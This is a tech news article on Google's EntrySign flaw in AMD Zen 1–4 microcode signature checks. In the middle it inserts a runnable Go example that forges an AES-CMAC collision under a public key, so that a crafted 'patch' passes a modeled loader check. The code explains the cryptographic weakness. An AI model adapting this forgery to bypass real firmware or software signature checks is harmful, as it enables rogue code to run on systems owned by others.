Published in News

Google finds flaws in all Zen processors

11 March 2025


From Zen 1 to Zen 4

Google's security boffins have uncovered a gaping security hole affecting every Zen processor from Zen 1 to Zen 4.

Dubbed EntrySign, the vulnerability lets an attacker with local admin-level (kernel) privileges sidestep AMD's microcode signature checks and load rogue microcode updates of their own.

When designing Zen, AMD made a shocking schoolboy error by using AES-CMAC as a hash function, something it was never designed for. CMAC is a message authentication code: it only guarantees integrity while its key stays secret, and once the key is known anyone can compute colliding inputs for it at will. Even worse, the boffins found AMD had been using a publicly available example key from NIST documentation since Zen 1, effectively rolling out the red carpet for hackers.

By exploiting this blunder, attackers can craft a rogue patch that the CPU accepts as genuine and inject microcode that alters the chip's fundamental behaviour until the next reboot, since microcode patches live in volatile storage and have to be reloaded on every boot.
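To see why a MAC keyed with a public value is worthless as a hash, and how that turns a rogue patch into an accepted one, here is an added example written for this article. It is not code from Google's zentool, from AMD, or from the original page. It implements AES-CMAC as in NIST SP 800-38B, takes the AES-128 example key from that document's worked examples as the public key (that AMD's key is this exact value is an assumption here), and then, from a "signed" legitimate blob and an attacker-chosen body, computes a single 16-byte fixup block so that the attacker's blob has the same CMAC value. A loader whose signature covers that CMAC value therefore accepts both. The blob contents, the function names and the LoaderAccepts model of the signature check are the example's own constructions; the real AMD patch format, signature layout and where such a fixup block would have to sit inside a patch are not covered by the page.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/hex"
	"fmt"
)

// NistExampleKey is the AES-128 key from the worked examples in NIST SP 800-38B
// (and RFC 4493); that AMD's public key is this exact value is an assumption.
var NistExampleKey, _ = hex.DecodeString("2b7e151628aed2a6abf7158809cf4f3c")

func xor(a, b []byte) []byte {
	out := make([]byte, len(a))
	for i := range a {
		out[i] = a[i] ^ b[i]
	}
	return out
}

// dbl multiplies a 128-bit block by x in GF(2^128): CMAC's subkey derivation.
func dbl(in []byte) []byte {
	out := make([]byte, 16)
	var carry byte
	for i := 15; i >= 0; i-- {
		out[i], carry = in[i]<<1|carry, in[i]>>7
	}
	if carry != 0 {
		out[15] ^= 0x87
	}
	return out
}

// chain is plain CBC-MAC over whole blocks; with a public key its state is steerable.
func chain(blk cipher.Block, blocks []byte) []byte {
	state := make([]byte, 16)
	for i := 0; i+16 <= len(blocks); i += 16 {
		blk.Encrypt(state, xor(state, blocks[i:i+16]))
	}
	return state
}

// CMAC is AES-CMAC as specified in NIST SP 800-38B.
func CMAC(blk cipher.Block, msg []byte) []byte {
	l := make([]byte, 16)
	blk.Encrypt(l, make([]byte, 16))
	k1 := dbl(l)
	k2 := dbl(k1)
	n := (len(msg) + 15) / 16
	var last []byte
	if n > 0 && len(msg)%16 == 0 {
		last = xor(msg[len(msg)-16:], k1) // complete final block uses K1
	} else {
		if n == 0 {
			n = 1
		}
		padded := make([]byte, 16)
		padded[copy(padded, msg[(n-1)*16:])] = 0x80 // 10* padding, then K2
		last = xor(padded, k2)
	}
	tag := make([]byte, 16)
	blk.Encrypt(tag, xor(chain(blk, msg[:(n-1)*16]), last))
	return tag
}

// ForgeCollision returns payload || fixup || (last block of legit) such that
// CMAC(result) == CMAC(legit). The fixup block, computed from the public key
// alone, steers the chaining state onto legit's state before its last block.
func ForgeCollision(blk cipher.Block, legit, payload []byte) []byte {
	if len(legit) < 16 || len(legit)%16 != 0 || len(payload)%16 != 0 {
		panic("legit needs >= 1 whole block; payload must be whole blocks")
	}
	sLegit := chain(blk, legit[:len(legit)-16])
	pre := make([]byte, 16)
	blk.Decrypt(pre, sLegit) // the block input that encrypts to sLegit
	forged := append([]byte{}, payload...)
	forged = append(forged, xor(pre, chain(blk, payload))...)
	return append(forged, legit[len(legit)-16:]...)
}

// LoaderAccepts models a loader whose signature covers CMAC(patch).
func LoaderAccepts(blk cipher.Block, patch, signedDigest []byte) bool {
	return bytes.Equal(CMAC(blk, patch), signedDigest)
}

func main() {
	blk, _ := aes.NewCipher(NistExampleKey) // 16-byte key, cannot fail
	fmt.Printf("CMAC(empty) = %x  (SP 800-38B example 1)\n", CMAC(blk, nil))
	// Constructed stand-ins for a vendor-signed patch and an attacker body.
	legit := bytes.Repeat([]byte("VENDORPATCH\x00\x00\x00\x00\x00"), 3) // 48 bytes
	payload := bytes.Repeat([]byte("RDRAND->CONSTANT"), 2)               // 32 bytes
	signed := CMAC(blk, legit) // the value the vendor's signature covers
	forged := ForgeCollision(blk, legit, payload)
	fmt.Println("legit accepted:", LoaderAccepts(blk, legit, signed),
		"forged accepted:", LoaderAccepts(blk, forged, signed),
		"forged starts with attacker body:", bytes.HasPrefix(forged, payload))
}
```

Run it with go run and both blobs are accepted. The fixup block is the only trick, and it needs nothing but the key: a loader that hashed the patch with a collision-resistant function, or checked a MAC under a key the attacker does not hold, would leave no way to compute it.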

Google’s researchers gleefully demonstrated this by tweaking the RDRAND instruction to always return predictable values, wreaking havoc on any cryptographic process relying on AMD’s random number generation.

To rub more salt in the wound, Google has released zentool, an open-source jailbreak kit that lets researchers create, sign and load microcode patches on vulnerable AMD chips.

With disassembly tools, patch creation, and cryptographic signing support, zentool lets researchers (and anyone curious) explore AMD's microcode ecosystem. This brings AMD up to speed with Chipzilla, whose processors have had similar tooling for years.

AMD has scrambled to release microcode updates that replace the compromised validation scheme with a custom secure hash function. With the fix in place, the AMD Secure Processor verifies a microcode update before the x86 cores are allowed to load it.

While the exploit requires local admin access and does not survive a reboot, it still spells bad news for confidential computing setups that rely on AMD's SEV-SNP and DRTM security features: those are meant to protect a guest or a measured launch from a compromised host operating system, and a compromised host is exactly what can load the rogue microcode.


Last modified on 11 March 2025